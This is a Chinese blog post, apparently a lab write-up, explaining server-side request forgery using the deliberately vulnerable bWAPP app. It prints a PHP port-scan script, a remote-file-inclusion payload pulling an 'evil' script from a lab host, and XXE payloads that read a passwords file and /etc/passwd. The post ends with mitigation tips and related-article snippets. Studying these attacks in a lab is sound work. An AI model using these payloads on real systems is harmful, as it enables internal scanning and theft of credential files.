ssrf漏洞分析

最新推荐文章于 2023-07-13 23:06:38 发布
最新推荐文章于 2023-07-13 23:06:38 发布
阅读量111 收藏
点赞数
分类专栏: web漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43152809/article/details/110422909
版权

什么是ssrf

ssrf(服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。

ssrf的攻击目标

外网无法访问的内部系统(由于请求是服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)

漏洞原理

服务端提供了从其他服务器应用获取数据的功能但没有对目标地址做过滤与限制

ssrf利用存在缺陷的web应用作为代理攻击远程和本地服务器

主要攻击方式

  1. 对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息
  2. 攻击运行在内网或者本地的应用程序
  3. 对内网web应用进行指纹识别,识别企业内部的资产信息
  4. 攻击内外网的web应用,主要是使用HTTP GET请求就可以实现的攻击
  5. 利用file协议读取本地文件等

ssrf漏洞利用

使用bwapp利用ssrf漏洞
bwapp下载地址:
虚拟机下载地址:https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
文件下载地址:https://sourceforge.net/projects/bwapp/files/bee-box/
使用bee/bug即可登陆
在这里插入图片描述
在这里插入图片描述

使用远程文件包含进行端口扫描

点击Port scan 可以获得一份端口扫描的攻击脚本

<?php

/*

bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.
It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities.
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!
It is for educational purposes only.

Enjoy!

Malik Mesellem
Twitter: @MME_IT

© 2013 MME BVBA. All rights reserved.

*/

echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>";

if(isset($_REQUEST["ip"]))
{
    
    //list of port numbers to scan
    $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
    
    $results = array();
    
    foreach($ports as $port)
    {

        if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
        {

            $results[$port] = true;
            fclose($pf);
            
        }
        
        else
        {

            $results[$port] = false;        

        }

    }
 
    foreach($results as $port=>$val)
    {

        $prot = getservbyport($port,"tcp");
        echo "Port $port ($prot): ";

        if($val)
        {

            echo "<span style=\"color:green\">OK</span><br/>";

        }

        else
        {

            echo "<span style=\"color:red\">Inaccessible</span><br/>";

        }

    }

}
?>

这个代码就不做过多的解释了

在choose your bug位置选择Remote & Local File Inclusion ,level选择low,在select a language位置,点击GO
可以看到

http://localhost/bWAPP/rlfi.php?language=lang_en.php&action=go

是一个很典型的文件包含

使用payload

POST:http://192.168.3.81/bWAPP/rlfi.php?language=http://192.168.3.81/evil/ssrf-1.txt&action=go

POST DATA:ip=192.168.8.1

成功获得结果
在这里插入图片描述

使用XXE获取敏感文件中的内容

点击Access获得XXE利用脚本
在这里插入图片描述
随后点击 XML External Entity Attacks (XXE)
在这里插入图片描述

使用burp抓包,并发送到repeater
在这里插入图片描述

使用http协议获取/bWAPP/robots.txt的内容

在这里插入图片描述



<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE root [

 <!ENTITY bWAPP SYSTEM

"http://192.168.3.81/bWAPP/robots.txt">

]>

<reset><login>&bWAPP;</login><secret>blah</secret></reset>

使用php协议获取/bWAPP/passwords/heroes.xml中的经过base64编码的数据
在这里插入图片描述

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE root [

 <!ENTITY bWAPP SYSTEM

"php://filter/read=convert.base64-encode/resource=http://192.168.3.81/bWAPP/passwords/heroes.xml">

]>



<reset><login>&bWAPP;</login><secret>blah</secret></reset>

利用file获得bWAPP本机/etc/passwd的内容
在这里插入图片描述

ssrf漏洞修复建议

  • 限制请求端口只能为web端口,只允许HTTP和HTTPS请求
  • 限制不能访问内网的IP,以防止对内网进行攻击
  • 屏蔽返回的详细信息

参考链接:
https://www.freebuf.com/column/157466.html

aur03a
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF系统漏洞技术分析.pptx
10-12
SSRF系统漏洞技术分析.pptx
Webug-SSRF
weixin_40646615的博客
02-24 168
文章目录Webug-SSRFfile协议的运用漏洞利用 Webug-SSRF SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 file协议的运用 Linux http://xxx.xxx.xxx./test.php?url=file:///etc/passwd 便可以获取敏感文件的信息。 Windows http://xxx.xxx.xxx./test.php?url=file:///C:/Window
webug4.0-ssrf
nex1less的博客
09-06 603
0x01 相关知识 1.什么是ssrf? SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人) 2.ssrf形成的原因是什么? SSRF 形成的原因大都是由于服...
离线同步任务存在SSRF攻击Task have SSRF attacts如何处理?
阿里云开发者
04-26 118
对数据源进行安全检查:在创建离线同步任务时,需要对数据源进行安全检查,确保数据源是可信的,并且不会被攻击者利用。可以采用一些安全性较高的数据源,如阿里云RDS、OSS等,同时也可以对自建的数据源进行安全加固。对URL进行安全检查:在同步任务中使用的URL需要进行安全检查,确保URL是合法的、安全的,并且不会被攻击者利用。离线同步任务存在SSRF攻击的情况,可能是由于同步任务中使用了不安全的URL或者数据源,导致攻击者可以通过构造特殊的URL或者数据来进行攻击。
webug4.0靶场通关笔记
qq_47289634的博客
07-13 1199
这里我试了空格或者“.”绕过,::$DATA绕过,双后缀名绕过,%00截断但是都不可以,这里可以使用生僻字进行绕过,比如这个 龘(dá),在repeater里面将文件名改为 shell.php龘.jpg,发现上传成功,这是因为他无法对这个字进行编码,所以后面的信息全部被过滤掉了。所谓越权就是用普通用户拥有管理员用户的权限,比如user的id=1,管理员的id=0,通过抓包修改这个参数,就可以达到越权的目的。打开靶场地址,把id参数改为-1,发现跟1比起来,内容缩短了一些,回显不一样。
webug4.0下载安装详细教程
陆总的博客
01-20 8166
一、背景:很久没更新博客了,在工作过程中解除到渗透测试相关内容,首先给小白介绍一个入门渗透测试很好的训练场,就是webug4.0(-是226安全团队送来的新年礼物); 二、详细操作流程: 1、前期材料准备: a、需要用到vm,大家可以自行下载VMware,但是考虑到大家还是想早点入门,此处付一官方下载链接:https://www.vmware.com/cn/products/...
第一节 SSRF原理介绍-01
最新发布
09-15
SSRF漏洞代码分析: 存在SSRF漏洞代码示例如下: function curl($url){ $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_HEADER,0); curl_exec($ch); curl_close($ch); } $url = ...
关于对SSRF漏洞测试及验证流程规范的补充公告.pdf
09-18
关于对SSRF漏洞测试及验证流程规范的补充公告 安全分析 安全体系 安全实践 数据分析 区块链
E049-论坛漏洞分析及利用-针对bwapp进行web渗透测试的探索.pdf
12-02
E049-论坛漏洞分析及利用-针对bwapp进行web渗透测试的探索
思维导图, 安全领域PHP代码审计;二进制漏洞分析;企业安全防御;渗透测试
06-30
二进制漏洞分析脑图 企业安全防御 渗透测试 渗透的艺术 渗透经验 图片隐写 网站SEO方案 习科技能表 业务安全TOP10 运维安全 智能设备 apk攻防脑图 C++编程语言思维导图 CTF题目工具资源 Kali Linux Linux 安全辅导 ...
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
漏洞靶站webug4.0
08-26
WeBug名称定义为“我们的漏洞”靶场环境 基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。 部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。
Webug 4.0下载地址-附件资源
03-05
Webug 4.0下载地址-附件资源
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
webug4.0靶场之SSRF
0nc3的博客
06-26 1474
0x00 SSRF测试 简单测试一下,包括下列内容: 使用file协议获取 探测内网端口 进入靶场直接404?? 修改下URL的路径进入首页 0x01 使用file协议读取 使用file协议获取C盘的/Windows/win.ini的内容。 0x02 探测内网端口是否开放 测一下小蜜蜂虚拟机是否开放SSH服务 ...
Webug4.0-webshell爆破 ssrf
baynk的博客
11-28 690
0x00 前言 Webug最后一篇了,虽然都在练习这些入门靶场,但是通过各种坑,在回顾一些老知识的同时,通过查找资料还是能学到一些新的东西的,刚刚开始学习安全不久,感觉还是挺麻烦的,大佬说我还没入门,不过昨天看人家挖SRC好像还挺有意思,让我有点小兴奋。。。。 下一个阶段可能会去体验一下吧,还是有点不太想把兴趣当作饭碗,希望可以保持初心。。。 0x01 webshell爆破 其实就是暴力破解,这...
渗透测试靶场WeBug4.0安装教程及文件
Zane·S的博客
04-28 3228
介绍 WeBug名称定义为“我们的漏洞”靶场环境 基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。 部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。 在webug3.0发布后的四百多天226安全团队终于在大年初二发布了webug的4.0版本。 webug...
Webug4.0 打靶笔记
m0_60716947的博客
05-11 4027
一、Webug 的安装 (1)基本信息 WeBug 名称定义为”我们的漏洞”靶场环境 ,基础环境是基于 PHP/mysql 制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。在 webug3.0 发布后的四百多天 226安全团队终于在大年初二发布了 webug 的 4.0 版本。 (2)虚拟机的安装 最新超详细VMware虚拟机下载与安装_隐
ssrf漏洞分析与实践
08-15
- *2* [SSRF漏洞分析与实践笔记](https://blog.csdn.net/lm19770429/article/details/108574028)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值